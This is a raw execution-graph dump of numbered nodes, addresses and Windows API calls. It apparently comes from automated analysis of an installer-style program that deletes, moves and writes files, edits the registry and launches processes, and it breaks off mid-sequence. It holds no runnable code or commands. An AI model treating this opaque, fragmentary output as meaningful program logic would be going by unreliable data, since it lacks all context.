                                                                                                              execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4181 405c64 4179->4181 4271 4063e8 lstrcpynW 4179->4271 4181->4180 4300 40672b FindFirstFileW 4181->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4186 405b78 4185->4186 4189 405b88 lstrcatW 4186->4189 4190 405b7e 4186->4190 4192 405b93 lstrlenW FindFirstFileW 4189->4192 4190->4189 4190->4192 4194 405c59 4192->4194 4213 405bb5 4192->4213 4193 405c82 4303 405cbd lstrlenW CharPrevW 4193->4303 4194->4181 4197 405ab2 5 API calls 4200 405c94 4197->4200 4199 405c3c FindNextFileW 4201 405c52 FindClose 4199->4201 4199->4213 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4194 4202->4180 4206 405450 24 API calls 4202->4206 4205 405450 24 API calls 4203->4205 4205->4180 4208 405ca5 4206->4208 4207 405afa 60 API calls 4207->4213 4210 4061ae 36 API calls 4208->4210 4209 405450 24 API calls 4209->4199 4211 405cac 4210->4211 4211->4180 4213->4199 4213->4207 4213->4209 4276 4063e8 lstrcpynW 4213->4276 4277 405ab2 4213->4277 4285 405450 4213->4285 4296 4061ae MoveFileExW 4213->4296 4229 406417 4215->4229 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219 406630 lstrlenW 4219->4229 4220 40640a 10 API calls 4220->4219 4223 406545 GetSystemDirectoryW 4223->4229 4225 406558 GetWindowsDirectoryW 4225->4229 4226 40667c 5 API calls 4226->4229 4227 40640a 10 API calls 4227->4229 4228 4065d3 lstrcatW 4228->4229 4229->4216 4229->4219 4229->4220 4229->4223 4229->4225 4229->4226 4229->4227 4229->4228 4230 40658c SHGetSpecialFolderLocation 4229->4230 4241 4062b6 4229->4241 4246 40632f wsprintfW 4229->4246 4247 4063e8 lstrcpynW 4229->4247 4230->4229 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4230->4231 4231->4229 4233 406689 4232->4233 4235 4066f2 CharNextW 4233->4235 4237 4066ff 4233->4237 4239 4066de CharNextW 4233->4239 4240 4066ed CharNextW 4233->4240 4253 405cea 4233->4253 4234 406704 CharPrevW 4234->4237 4235->4233 4235->4237 4237->4234 4238 406725 4237->4238 4238->4173 4239->4233 4240->4235 4249 406255 4241->4249 4244 40631a 4244->4229 4245 4062ea RegQueryValueExW RegCloseKey 4245->4244 4246->4229 4247->4229 4248->4217 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4233 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4266 405cbd 3 API calls 4265->4266 4268 405e2d GetFileAttributesW 4266->4268 4267 40672b 2 API calls 4267->4269 4268->4262 4269->4262 4269->4264 4269->4267 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4186 4275->4273 4275->4274 4276->4213 4313 405eb9 GetFileAttributesW 4277->4313 4280 405ad5 DeleteFileW 4282 405adb 4280->4282 4281 405acd RemoveDirectoryW 4281->4282 4283 405adf 4282->4283 4284 405aeb SetFileAttributesW 4282->4284 4283->4213 4284->4283 4286 40546b 4285->4286 4295 40550d 4285->4295 4287 405487 lstrlenW 4286->4287 4288 40640a 17 API calls 4286->4288 4289 4054b0 4287->4289 4290 405495 lstrlenW 4287->4290 4288->4287 4292 4054c3 4289->4292 4293 4054b6 SetWindowTextW 4289->4293 4291 4054a7 lstrcatW 4290->4291 4290->4295 4291->4289 4294 4054c9 SendMessageW SendMessageW SendMessageW 4292->4294 4292->4295 4293->4292 4294->4295 4295->4213 4297 4061cf 4296->4297 4298 4061c2 4296->4298 4297->4213 4316 406034 4298->4316 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4193 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4197 4305->4304 4306->4259 4308 405d85 4307->4308 4309 405d97 4307->4309 4308->4309 4310 405d92 CharNextW 4308->4310 4311 405cea CharNextW 4309->4311 4312 405dbb 4309->4312 4310->4312 4311->4309 4312->4262 4312->4263 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4283 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4320 4061a9 4318->4320 4321 40609f 4318->4321 4320->4297 4321->4320 4323 4060a7 wsprintfA 4321->4323 4322 40606e CloseHandle GetShortPathNameW 4322->4320 4324 406082 4322->4324 4325 40640a 17 API calls 4323->4325 4324->4318 4324->4320 4326 4060cf 4325->4326 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4320 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4320 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4322 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4362 4015d1 4357->4362 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4362 4364 401423 24 API calls 4360->4364 4381 401423 4361->4381 4362->4358 4362->4359 4371 401617 GetFileAttributesW 4362->4371 4373 4059b9 4362->4373 4376 40591f CreateDirectoryW 4362->4376 4385 40599c CreateDirectoryW 4362->4385 4370 40165b 4364->4370 4369 40164a SetCurrentDirectoryW 4369->4370 4371->4362 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4362 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4369 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4362 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 4390->4394 4392->4362 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 4397 4053c4 4398 4053d4 4397->4398 4399 4053e8 4397->4399 4400 405431 4398->4400 4401 4053da 4398->4401 4402 4053f0 IsWindowVisible 4399->4402 4409 405410 4399->4409 4403 405436 CallWindowProcW 4400->4403 4411 4043ab 4401->4411 4402->4400 4405 4053fd 4402->4405 4406 4053e4 4403->4406 4414 404d1a SendMessageW 4405->4414 4409->4403 4419 404d9a 4409->4419 4412 4043c3 4411->4412 4413 4043b4 SendMessageW 4411->4413 4412->4406 4413->4412 4415 404d79 SendMessageW 4414->4415 4416 404d3d GetMessagePos ScreenToClient SendMessageW 4414->4416 4417 404d71 4415->4417 4416->4417 4418 404d76 4416->4418 4417->4409 4418->4415 4428 4063e8 lstrcpynW 4419->4428 4421 404dad 4429 40632f wsprintfW 4421->4429 4423 404db7 4430 40140b 4423->4430 4427 404dc7 4427->4400 4428->4421 4429->4423 4434 401389 4430->4434 4433 4063e8 lstrcpynW 4433->4427 4436 401390 4434->4436 4435 4013fe 4435->4433 4436->4435 4437 4013cb MulDiv SendMessageW 4436->4437 4437->4436 5288 73f922fd 5289 73f92367 5288->5289 5290 73f92372 GlobalAlloc 5289->5290 5291 73f92391 5289->5291 5290->5289 4882 401e49 4883 402c1f 17 API calls 4882->4883 4884 401e4f 4883->4884 4885 402c1f 17 API calls 4884->4885 4886 401e5b 4885->4886 4887 401e72 EnableWindow 4886->4887 4888 401e67 ShowWindow 4886->4888 4889 402ac5 4887->4889 4888->4889 4890 40264a 4891 402c1f 17 API calls 4890->4891 4892 402659 4891->4892 4893 4026a3 ReadFile 4892->4893 4894 405f61 ReadFile 4892->4894 4895 4026e3 MultiByteToWideChar 4892->4895 4896 402798 4892->4896 4899 40273c 4892->4899 4900 402709 SetFilePointer MultiByteToWideChar 4892->4900 4901 4027a9 4892->4901 4903 402796 4892->4903 4893->4892 4893->4903 4894->4892 4895->4892 4913 40632f wsprintfW 4896->4913 4899->4892 4899->4903 4904 405fbf SetFilePointer 4899->4904 4900->4892 4902 4027ca SetFilePointer 4901->4902 4901->4903 4902->4903 4905 405fdb 4904->4905 4912 405ff3 4904->4912 4906 405f61 ReadFile 4905->4906 4907 405fe7 4906->4907 4908 406024 SetFilePointer 4907->4908 4909 405ffc SetFilePointer 4907->4909 4907->4912 4908->4912 4909->4908 4910 406007 4909->4910 4911 405f90 WriteFile 4910->4911 4911->4912 4912->4899 4913->4903 4917 404dcc GetDlgItem GetDlgItem 4918 404e1e 7 API calls 4917->4918 4928 405037 4917->4928 4919 404ec1 DeleteObject 4918->4919 4920 404eb4 SendMessageW 4918->4920 4921 404eca 4919->4921 4920->4919 4923 404ed9 4921->4923 4924 404f01 4921->4924 4922 40511b 4926 4051c7 4922->4926 4931 4053af 4922->4931 4938 405174 SendMessageW 4922->4938 4927 40640a 17 API calls 4923->4927 4925 40435f 18 API calls 4924->4925 4930 404f15 4925->4930 4932 4051d1 SendMessageW 4926->4932 4933 4051d9 4926->4933 4934 404ee3 SendMessageW SendMessageW 4927->4934 4928->4922 4929 4050fc 4928->4929 4935 405097 4928->4935 4929->4922 4940 40510d SendMessageW 4929->4940 4937 40435f 18 API calls 4930->4937 4939 4043c6 8 API calls 4931->4939 4932->4933 4941 4051f2 4933->4941 4942 4051eb ImageList_Destroy 4933->4942 4949 405202 4933->4949 4934->4921 4936 404d1a 5 API calls 4935->4936 4952 4050a8 4936->4952 4953 404f23 4937->4953 4938->4931 4944 405189 SendMessageW 4938->4944 4945 4053bd 4939->4945 4940->4922 4946 4051fb GlobalFree 4941->4946 4941->4949 4942->4941 4943 405371 4943->4931 4950 405383 ShowWindow GetDlgItem ShowWindow 4943->4950 4948 40519c 4944->4948 4946->4949 4947 404ff8 GetWindowLongW SetWindowLongW 4951 405011 4947->4951 4959 4051ad SendMessageW 4948->4959 4949->4943 4964 404d9a 4 API calls 4949->4964 4966 40523d 4949->4966 4950->4931 4954 405017 ShowWindow 4951->4954 4955 40502f 4951->4955 4952->4929 4953->4947 4958 404f73 SendMessageW 4953->4958 4960 404ff2 4953->4960 4962 404fc0 SendMessageW 4953->4962 4963 404faf SendMessageW 4953->4963 4973 404394 SendMessageW 4954->4973 4974 404394 SendMessageW 4955->4974 4958->4953 4959->4926 4960->4947 4960->4951 4961 40502a 4961->4931 4962->4953 4963->4953 4964->4966 4965 405347 InvalidateRect 4965->4943 4967 40535d 4965->4967 4968 40526b SendMessageW 4966->4968 4969 405281 4966->4969 4975 404cd5 4967->4975 4968->4969 4969->4965 4970 4052e2 4969->4970 4972 4052f5 SendMessageW SendMessageW 4969->4972 4970->4972 4972->4969 4973->4961 4974->4928 4978 404c0c 4975->4978 4977 404cea 4977->4943 4979 404c25 4978->4979 4980 40640a 17 API calls 4979->4980 4981 404c89 4980->4981 4982 40640a 17 API calls 4981->4982 4983 404c94 4982->4983 4984 40640a 17 API calls 4983->4984 4985 404caa lstrlenW wsprintfW SetDlgItemTextW 4984->4985 4985->4977 5295 4016cc 5296 402c41 17 API calls 5295->5296 5297 4016d2 GetFullPathNameW 5296->5297 5298 40170e 5297->5298 5299 4016ec 5297->5299 5300 401723 GetShortPathNameW 5298->5300 5301 402ac5 5298->5301 5299->5298 5302 40672b 2 API calls 5299->5302 5300->5301 5303 4016fe 5302->5303 5303->5298 5305 4063e8 lstrcpynW 5303->5305 5305->5298 5306 40234e 5307 402c41 17 API calls 5306->5307 5308 40235d 5307->5308 5309 402c41 17 API calls 5308->5309 5310 402366 5309->5310 5311 402c41 17 API calls 5310->5311 5312 402370 GetPrivateProfileStringW 5311->5312 5313 4044cf lstrlenW 5314 4044f0 WideCharToMultiByte 5313->5314 5315 4044ee 5313->5315 5315->5314 5316 404850 5317 40487c 5316->5317 5318 40488d 5316->5318 5377 405a32 GetDlgItemTextW 5317->5377 5320 404899 GetDlgItem 5318->5320 5323 4048f8 5318->5323 5322 4048ad 5320->5322 5321 404887 5324 40667c 5 API calls 5321->5324 5326 4048c1 SetWindowTextW 5322->5326 5331 405d68 4 API calls 5322->5331 5327 40640a 17 API calls 5323->5327 5338 4049dc 5323->5338 5375 404b8b 5323->5375 5324->5318 5329 40435f 18 API calls 5326->5329 5333 40496c SHBrowseForFolderW 5327->5333 5328 404a0c 5334 405dc5 18 API calls 5328->5334 5335 4048dd 5329->5335 5330 4043c6 8 API calls 5336 404b9f 5330->5336 5332 4048b7 5331->5332 5332->5326 5341 405cbd 3 API calls 5332->5341 5337 404984 CoTaskMemFree 5333->5337 5333->5338 5339 404a12 5334->5339 5340 40435f 18 API calls 5335->5340 5342 405cbd 3 API calls 5337->5342 5338->5375 5379 405a32 GetDlgItemTextW 5338->5379 5380 4063e8 lstrcpynW 5339->5380 5343 4048eb 5340->5343 5341->5326 5344 404991 5342->5344 5378 404394 SendMessageW 5343->5378 5347 4049c8 SetDlgItemTextW 5344->5347 5352 40640a 17 API calls 5344->5352 5347->5338 5348 4048f1 5350 4067c2 5 API calls 5348->5350 5349 404a29 5351 4067c2 5 API calls 5349->5351 5350->5323 5358 404a30 5351->5358 5353 4049b0 lstrcmpiW 5352->5353 5353->5347 5356 4049c1 lstrcatW 5353->5356 5354 404a71 5381 4063e8 lstrcpynW 5354->5381 5356->5347 5357 404a78 5359 405d68 4 API calls 5357->5359 5358->5354 5362 405d09 2 API calls 5358->5362 5364 404ac9 5358->5364 5360 404a7e GetDiskFreeSpaceW 5359->5360 5363 404aa2 MulDiv 5360->5363 5360->5364 5362->5358 5363->5364 5365 404b3a 5364->5365 5367 404cd5 20 API calls 5364->5367 5366 404b5d 5365->5366 5368 40140b 2 API calls 5365->5368 5382 404381 EnableWindow 5366->5382 5369 404b27 5367->5369 5368->5366 5371 404b3c SetDlgItemTextW 5369->5371 5372 404b2c 5369->5372 5371->5365 5374 404c0c 20 API calls 5372->5374 5373 404b79 5373->5375 5383 4047a9 5373->5383 5374->5365 5375->5330 5377->5321 5378->5348 5379->5328 5380->5349 5381->5357 5382->5373 5384 4047b7 5383->5384 5385 4047bc SendMessageW 5383->5385 5384->5385 5385->5375 5386 401b53 5387 402c41 17 API calls 5386->5387 5388 401b5a 5387->5388 5389 402c1f 17 API calls 5388->5389 5390 401b63 wsprintfW 5389->5390 5391 402ac5 5390->5391 5392 73f9166d 5398 73f91516 5392->5398 5394 73f916cb GlobalFree 5395 73f91685 5395->5394 5396 73f916a0 5395->5396 5397 73f916b7 VirtualFree 5395->5397 5396->5394 5397->5394 5400 73f9151c 5398->5400 5399 73f91522 5399->5395 5400->5399 5401 73f9152e GlobalFree 5400->5401 5401->5395 5402 401956 5403 402c41 17 API calls 5402->5403 5404 40195d lstrlenW 5403->5404 5405 402592 5404->5405 5413 4014d7 5414 402c1f 17 API calls 5413->5414 5415 4014dd Sleep 5414->5415 5417 402ac5 5415->5417 5418 401f58 5419 402c41 17 API calls 5418->5419 5420 401f5f 5419->5420 5421 40672b 2 API calls 5420->5421 5422 401f65 5421->5422 5424 401f76 5422->5424 5425 40632f wsprintfW 5422->5425 5425->5424 5426 73f910e1 5430 73f91111 5426->5430 5427 73f911d8 GlobalFree 5428 73f912ba 2 API calls 5428->5430 5429 73f911d3 5429->5427 5430->5427 5430->5428 5430->5429 5431 73f91164 GlobalAlloc 5430->5431 5432 73f911f8 GlobalFree 5430->5432 5433 73f91272 2 API calls 5430->5433 5434 73f912e1 lstrcpyW 5430->5434 5435 73f911c4 GlobalFree 5430->5435 5431->5430 5432->5430 5433->5435 5434->5430 5435->5430 5436 402259 5437 402c41 17 API calls 5436->5437 5438 40225f 5437->5438 5439 402c41 17 API calls 5438->5439 5440 402268 5439->5440 5441 402c41 17 API calls 5440->5441 5442 402271 5441->5442 5443 40672b 2 API calls 5442->5443 5444 40227a 5443->5444 5445 40228b lstrlenW lstrlenW 5444->5445 5446 40227e 5444->5446 5448 405450 24 API calls 5445->5448 5447 405450 24 API calls 5446->5447 5450 402286 5447->5450 5449 4022c9 SHFileOperationW 5448->5449 5449->5446 5449->5450 5282 40175c 5283 402c41 17 API calls 5282->5283 5284 401763 5283->5284 5285 405f0d 2 API calls 5284->5285 5286 40176a 5285->5286 5287 405f0d 2 API calls 5286->5287 5287->5286 5451 401d5d GetDlgItem GetClientRect 5452 402c41 17 API calls 5451->5452 5453 401d8f LoadImageW SendMessageW 5452->5453 5454 402ac5 5453->5454 5455 401dad DeleteObject 5453->5455 5455->5454 5456 4022dd 5457 4022e4 5456->5457 5461 4022f7 5456->5461 5458 40640a 17 API calls 5457->5458 5459 4022f1 5458->5459 5460 405a4e MessageBoxIndirectW 5459->5460 5460->5461 5462 73f918d9 5463 73f918fc 5462->5463 5464 73f91931 GlobalFree 5463->5464 5465 73f91943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5463->5465 5464->5465 5466 73f91272 2 API calls 5465->5466 5467 73f91ace GlobalFree GlobalFree 5466->5467 5468 73f91058 5471 73f91074 5468->5471 5469 73f910dd 5470 73f91092 5473 73f91516 GlobalFree 5470->5473 5471->5469 5471->5470 5472 73f91516 GlobalFree 5471->5472 5472->5470 5474 73f910a2 5473->5474 5475 73f910a9 GlobalSize 5474->5475 5476 73f910b2 5474->5476 5475->5476 5477 73f910c7 5476->5477 5478 73f910b6 GlobalAlloc 5476->5478 5480 73f910d2 GlobalFree 5477->5480 5479 73f9153d 3 API calls 5478->5479 5479->5477 5480->5469 5481 401563 5482 402a6b 5481->5482 5485 40632f wsprintfW 5482->5485 5484 402a70 5485->5484 4438 4023e4 4439 402c41 17 API calls 4438->4439 4440 4023f6 4439->4440 4441 402c41 17 API calls 4440->4441 4442 402400 4441->4442 4455 402cd1 4442->4455 4445 402438 4453 402444 4445->4453 4459 402c1f 4445->4459 4446 40288b 4447 402c41 17 API calls 4449 40242e lstrlenW 4447->4449 4448 402463 RegSetValueExW 4452 402479 RegCloseKey 4448->4452 4449->4445 4452->4446 4453->4448 4462 4031d6 4453->4462 4456 402cec 4455->4456 4477 406283 4456->4477 4460 40640a 17 API calls 4459->4460 4461 402c34 4460->4461 4461->4453 4463 403201 4462->4463 4464 4031e5 SetFilePointer 4462->4464 4481 4032de GetTickCount 4463->4481 4464->4463 4467 405f61 ReadFile 4468 403221 4467->4468 4469 4032de 42 API calls 4468->4469 4476 40329e 4468->4476 4470 403238 4469->4470 4471 4032a4 ReadFile 4470->4471 4475 403247 4470->4475 4470->4476 4471->4476 4473 405f61 ReadFile 4473->4475 4474 405f90 WriteFile 4474->4475 4475->4473 4475->4474 4475->4476 4476->4448 4478 406292 4477->4478 4479 402410 4478->4479 4480 40629d RegCreateKeyExW 4478->4480 4479->4445 4479->4446 4479->4447 4480->4479 4482 403436 4481->4482 4483 40330c 4481->4483 4484 402e8e 32 API calls 4482->4484 4494 40345d SetFilePointer 4483->4494 4490 403208 4484->4490 4486 403317 SetFilePointer 4492 40333c 4486->4492 4490->4467 4490->4476 4491 405f90 WriteFile 4491->4492 4492->4490 4492->4491 4493 403417 SetFilePointer 4492->4493 4495 403447 4492->4495 4498 406943 4492->4498 4505 402e8e 4492->4505 4493->4482 4494->4486 4496 405f61 ReadFile 4495->4496 4497 40345a 4496->4497 4497->4492 4499 406968 4498->4499 4500 406970 4498->4500 4499->4492 4500->4499 4501 406a00 GlobalAlloc 4500->4501 4502 4069f7 GlobalFree 4500->4502 4503 406a77 GlobalAlloc 4500->4503 4504 406a6e GlobalFree 4500->4504 4501->4499 4501->4500 4502->4501 4503->4499 4503->4500 4504->4503 4506 402eb7 4505->4506 4507 402e9f 4505->4507 4510 402ec7 GetTickCount 4506->4510 4511 402ebf 4506->4511 4508 402ea8 DestroyWindow 4507->4508 4509 402eaf 4507->4509 4508->4509 4509->4492 4510->4509 4512 402ed5 4510->4512 4520 4067fe 4511->4520 4514 402f0a CreateDialogParamW ShowWindow 4512->4514 4515 402edd 4512->4515 4514->4509 4515->4509 4524 402e72 4515->4524 4517 402eeb wsprintfW 4518 405450 24 API calls 4517->4518 4519 402f08 4518->4519 4519->4509 4521 40681b PeekMessageW 4520->4521 4522 406811 DispatchMessageW 4521->4522 4523 40682b 4521->4523 4522->4521 4523->4509 4525 402e81 4524->4525 4526 402e83 MulDiv 4524->4526 4525->4526 4526->4517 5486 4071e5 5489 406976 5486->5489 5487 406a00 GlobalAlloc 5487->5489 5490 4072e1 5487->5490 5488 4069f7 GlobalFree 5488->5487 5489->5487 5489->5488 5489->5489 5489->5490 5491 406a77 GlobalAlloc 5489->5491 5492 406a6e GlobalFree 5489->5492 5491->5489 5491->5490 5492->5491 5493 402868 5494 402c41 17 API calls 5493->5494 5495 40286f FindFirstFileW 5494->5495 5496 402897 5495->5496 5499 402882 5495->5499 5501 40632f wsprintfW 5496->5501 5498 4028a0 5502 4063e8 lstrcpynW 5498->5502 5501->5498 5502->5499 5503 401968 5504 402c1f 17 API calls 5503->5504 5505 40196f 5504->5505 5506 402c1f 17 API calls 5505->5506 5507 40197c 5506->5507 5508 402c41 17 API calls 5507->5508 5509 401993 lstrlenW 5508->5509 5511 4019a4 5509->5511 5510 4019e5 5511->5510 5515 4063e8 lstrcpynW 5511->5515 5513 4019d5 5513->5510 5514 4019da lstrlenW 5513->5514 5514->5510 5515->5513 5516 40166a 5517 402c41 17 API calls 5516->5517 5518 401670 5517->5518 5519 40672b 2 API calls 5518->5519 5520 401676 5519->5520 5521 73f916d4 5522 73f91703 5521->5522 5523 73f91b5f 22 API calls 5522->5523 5524 73f9170a 5523->5524 5525 73f9171d 5524->5525 5526 73f91711 5524->5526 5528 73f91744 5525->5528 5529 73f91727 5525->5529 5527 73f91272 2 API calls 5526->5527 5532 73f9171b 5527->5532 5530 73f9174a 5528->5530 5531 73f9176e 5528->5531 5533 73f9153d 3 API calls 5529->5533 5534 73f915b4 3 API calls 5530->5534 5535 73f9153d 3 API calls 5531->5535 5536 73f9172c 5533->5536 5537 73f9174f 5534->5537 5535->5532 5538 73f915b4 3 API calls 5536->5538 5539 73f91272 2 API calls 5537->5539 5540 73f91732 5538->5540 5541 73f91755 GlobalFree 5539->5541 5542 73f91272 2 API calls 5540->5542 5541->5532 5543 73f91769 GlobalFree 5541->5543 5544 73f91738 GlobalFree 5542->5544 5543->5532 5544->5532 5545 73f92c57 5546 73f92c6f 5545->5546 5547 73f9158f 2 API calls 5546->5547 5548 73f92c8a 5547->5548 5015 40176f 5016 402c41 17 API calls 5015->5016 5017 401776 5016->5017 5018 401796 5017->5018 5019 40179e 5017->5019 5055 4063e8 lstrcpynW 5018->5055 5056 4063e8 lstrcpynW 5019->5056 5022 40179c 5026 40667c 5 API calls 5022->5026 5023 4017a9 5024 405cbd 3 API calls 5023->5024 5025 4017af lstrcatW 5024->5025 5025->5022 5031 4017bb 5026->5031 5027 4017f7 5029 405eb9 2 API calls 5027->5029 5028 40672b 2 API calls 5028->5031 5029->5031 5031->5027 5031->5028 5032 4017cd CompareFileTime 5031->5032 5033 40188d 5031->5033 5038 4063e8 lstrcpynW 5031->5038 5042 40640a 17 API calls 5031->5042 5048 405a4e MessageBoxIndirectW 5031->5048 5051 401864 5031->5051 5054 405ede GetFileAttributesW CreateFileW 5031->5054 5032->5031 5034 405450 24 API calls 5033->5034 5036 401897 5034->5036 5035 405450 24 API calls 5053 401879 5035->5053 5037 4031d6 44 API calls 5036->5037 5039 4018aa 5037->5039 5038->5031 5040 4018be SetFileTime 5039->5040 5041 4018d0 CloseHandle 5039->5041 5040->5041 5043 4018e1 5041->5043 5041->5053 5042->5031 5044 4018e6 5043->5044 5045 4018f9 5043->5045 5046 40640a 17 API calls 5044->5046 5047 40640a 17 API calls 5045->5047 5049 4018ee lstrcatW 5046->5049 5050 401901 5047->5050 5048->5031 5049->5050 5052 405a4e MessageBoxIndirectW 5050->5052 5051->5035 5051->5053 5052->5053 5054->5031 5055->5022 5056->5023 5057 4027ef 5058 4027f6 5057->5058 5060 402a70 5057->5060 5059 402c1f 17 API calls 5058->5059 5061 4027fd 5059->5061 5062 40280c SetFilePointer 5061->5062 5062->5060 5063 40281c 5062->5063 5065 40632f wsprintfW 5063->5065 5065->5060 5549 401a72 5550 402c1f 17 API calls 5549->5550 5551 401a7b 5550->5551 5552 402c1f 17 API calls 5551->5552 5553 401a20 5552->5553 5554 406af2 5555 406976 5554->5555 5556 4072e1 5555->5556 5557 406a00 GlobalAlloc 5555->5557 5558 4069f7 GlobalFree 5555->5558 5559 406a77 GlobalAlloc 5555->5559 5560 406a6e GlobalFree 5555->5560 5557->5555 5557->5556 5558->5557 5559->5555 5559->5556 5560->5559 5561 401573 5562 401583 ShowWindow 5561->5562 5563 40158c 5561->5563 5562->5563 5564 40159a ShowWindow 5563->5564 5565 402ac5 5563->5565 5564->5565 5566 401cf3 5567 402c1f 17 API calls 5566->5567 5568 401cf9 IsWindow 5567->5568 5569 401a20 5568->5569 5570 402df3 5571 402e05 SetTimer 5570->5571 5572 402e1e 5570->5572 5571->5572 5573 402e6c 5572->5573 5574 402e72 MulDiv 5572->5574 5575 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5574->5575 5575->5573 5577 4014f5 SetForegroundWindow 5578 402ac5 5577->5578 5579 402576 5580 402c41 17 API calls 5579->5580 5581 40257d 5580->5581 5584 405ede GetFileAttributesW CreateFileW 5581->5584 5583 402589 5584->5583 5585 401b77 5586 401b84 5585->5586 5587 401bc8 5585->5587 5588 401c0d 5586->5588 5594 401b9b 5586->5594 5589 401bf2 GlobalAlloc 5587->5589 5590 401bcd 5587->5590 5592 40640a 17 API calls 5588->5592 5596 4022f7 5588->5596 5591 40640a 17 API calls 5589->5591 5590->5596 5606 4063e8 lstrcpynW 5590->5606 5591->5588 5598 4022f1 5592->5598 5604 4063e8 lstrcpynW 5594->5604 5595 401bdf GlobalFree 5595->5596 5600 405a4e MessageBoxIndirectW 5598->5600 5599 401baa 5605 4063e8 lstrcpynW 5599->5605 5600->5596 5602 401bb9 5607 4063e8 lstrcpynW 5602->5607 5604->5599 5605->5602 5606->5595 5607->5596 5257 4024f8 5258 402c81 17 API calls 5257->5258 5259 402502 5258->5259 5260 402c1f 17 API calls 5259->5260 5261 40250b 5260->5261 5262 402533 RegEnumValueW 5261->5262 5263 402527 RegEnumKeyW 5261->5263 5266 40288b 5261->5266 5264 40254f RegCloseKey 5262->5264 5265 402548 5262->5265 5263->5264 5264->5266 5265->5264 5268 40167b 5269 402c41 17 API calls 5268->5269 5270 401682 5269->5270 5271 402c41 17 API calls 5270->5271 5272 40168b 5271->5272 5273 402c41 17 API calls 5272->5273 5274 401694 MoveFileW 5273->5274 5275 4016a0 5274->5275 5276 4016a7 5274->5276 5277 401423 24 API calls 5275->5277 5278 40672b 2 API calls 5276->5278 5280 402250 5276->5280 5277->5280 5279 4016b6 5278->5279 5279->5280 5281 4061ae 36 API calls 5279->5281 5281->5275 5615 401e7d 5616 402c41 17 API calls 5615->5616 5617 401e83 5616->5617 5618 402c41 17 API calls 5617->5618 5619 401e8c 5618->5619 5620 402c41 17 API calls 5619->5620 5621 401e95 5620->5621 5622 402c41 17 API calls 5621->5622 5623 401e9e 5622->5623 5624 401423 24 API calls 5623->5624 5625 401ea5 5624->5625 5632 405a14 ShellExecuteExW 5625->5632 5627 401ee7 5629 40288b 5627->5629 5633 406873 WaitForSingleObject 5627->5633 5630 401f01 CloseHandle 5630->5629 5632->5627 5634 40688d 5633->5634 5635 40689f GetExitCodeProcess 5634->5635 5636 4067fe 2 API calls 5634->5636 5635->5630 5637 406894 WaitForSingleObject 5636->5637 5637->5634 5638 4019ff 5639 402c41 17 API calls 5638->5639 5640 401a06 5639->5640 5641 402c41 17 API calls 5640->5641 5642 401a0f 5641->5642 5643 401a16 lstrcmpiW 5642->5643 5644 401a28 lstrcmpW 5642->5644 5645 401a1c 5643->5645 5644->5645 5646 401000 5647 401037 BeginPaint GetClientRect 5646->5647 5648 40100c DefWindowProcW 5646->5648 5650 4010f3 5647->5650 5651 401179 5648->5651 5652 401073 CreateBrushIndirect FillRect DeleteObject 5650->5652 5653 4010fc 5650->5653 5652->5650 5654 401102 CreateFontIndirectW 5653->5654 5655 401167 EndPaint 5653->5655 5654->5655 5656 401112 6 API calls 5654->5656 5655->5651 5656->5655 5657 401503 5658 40150b 5657->5658 5660 40151e 5657->5660 5659 402c1f 17 API calls 5658->5659 5659->5660 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 